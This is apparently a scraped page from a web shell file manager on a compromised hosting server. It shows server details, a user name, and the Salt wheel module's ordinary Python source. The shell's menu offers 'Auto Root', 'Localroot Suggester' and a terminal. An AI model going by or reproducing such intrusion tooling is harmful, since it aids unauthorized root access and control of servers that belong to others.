Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3.6 /
site-packages /
salt /
wheel /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2022-10-11 05:09
__init__.py
4.37
KB
-rw-r--r--
2022-05-16 09:16
config.py
2.21
KB
-rw-r--r--
2022-05-16 09:16
error.py
548
B
-rw-r--r--
2022-05-16 09:16
file_roots.py
3.55
KB
-rw-r--r--
2022-05-16 09:16
key.py
13.66
KB
-rw-r--r--
2022-05-16 09:16
minions.py
490
B
-rw-r--r--
2022-05-16 09:16
pillar_roots.py
3.62
KB
-rw-r--r--
2022-05-16 09:16
Save
Rename
""" Modules used to control the master itself """ from collections.abc import Mapping import salt.client.mixins import salt.config import salt.loader import salt.transport.client import salt.utils.error import salt.utils.zeromq class WheelClient( salt.client.mixins.SyncClientMixin, salt.client.mixins.AsyncClientMixin ): """ An interface to Salt's wheel modules :ref:`Wheel modules <all-salt.wheel>` interact with various parts of the Salt Master. Importing and using ``WheelClient`` must be done on the same machine as the Salt Master and it must be done using the same user that the Salt Master is running as. Unless :conf_master:`external_auth` is configured and the user is authorized to execute wheel functions: (``@wheel``). Usage: .. code-block:: python import salt.config import salt.wheel opts = salt.config.master_config('/etc/salt/master') wheel = salt.wheel.WheelClient(opts) """ client = "wheel" tag_prefix = "wheel" def __init__(self, opts=None): self.opts = opts self.context = {} self.functions = salt.loader.wheels(opts, context=self.context) # TODO: remove/deprecate def call_func(self, fun, **kwargs): """ Backwards compatibility """ return self.low( fun, kwargs, print_event=kwargs.get("print_event", True), full_return=kwargs.get("full_return", False), ) # TODO: Inconsistent with runner client-- the runner client's master_call gives # an asynchronous return, unlike this def master_call(self, **kwargs): """ Execute a wheel function through the master network interface (eauth). """ load = kwargs load["cmd"] = "wheel" interface = self.opts["interface"] if interface == "0.0.0.0": interface = "127.0.0.1" master_uri = "tcp://{}:{}".format( salt.utils.zeromq.ip_bracket(interface), str(self.opts["ret_port"]), ) with salt.transport.client.ReqChannel.factory( self.opts, crypt="clear", master_uri=master_uri, usage="master_call" ) as channel: ret = channel.send(load) if isinstance(ret, Mapping): if "error" in ret: salt.utils.error.raise_error(**ret["error"]) return ret def cmd_sync(self, low, timeout=None, full_return=False): """ Execute a wheel function synchronously; eauth is respected This function requires that :conf_master:`external_auth` is configured and the user is authorized to execute runner functions: (``@wheel``). .. code-block:: python >>> wheel.cmd_sync({ 'fun': 'key.finger', 'match': 'jerry', 'eauth': 'auto', 'username': 'saltdev', 'password': 'saltdev', }) {'minions': {'jerry': '5d:f6:79:43:5e:d4:42:3f:57:b8:45:a8:7e:a4:6e:ca'}} """ return self.master_call(**low) # TODO: Inconsistent with runner client-- that one uses the master_call function # and runs within the master daemon. Need to pick one... def cmd_async(self, low): """ Execute a function asynchronously; eauth is respected This function requires that :conf_master:`external_auth` is configured and the user is authorized .. code-block:: python >>> wheel.cmd_async({ 'fun': 'key.finger', 'match': 'jerry', 'eauth': 'auto', 'username': 'saltdev', 'password': 'saltdev', }) {'jid': '20131219224744416681', 'tag': 'salt/wheel/20131219224744416681'} """ fun = low.get("fun") return self.asynchronous(fun, low, local=False) def cmd( self, fun, arg=None, pub_data=None, kwarg=None, print_event=True, full_return=False, ): # pylint: disable=useless-super-delegation """ Execute a function .. code-block:: python >>> wheel.cmd('key.finger', ['jerry']) {'minions': {'jerry': '5d:f6:79:43:5e:d4:42:3f:57:b8:45:a8:7e:a4:6e:ca'}} """ return super().cmd(fun, arg, pub_data, kwarg, print_event, full_return) Wheel = WheelClient # for backward-compat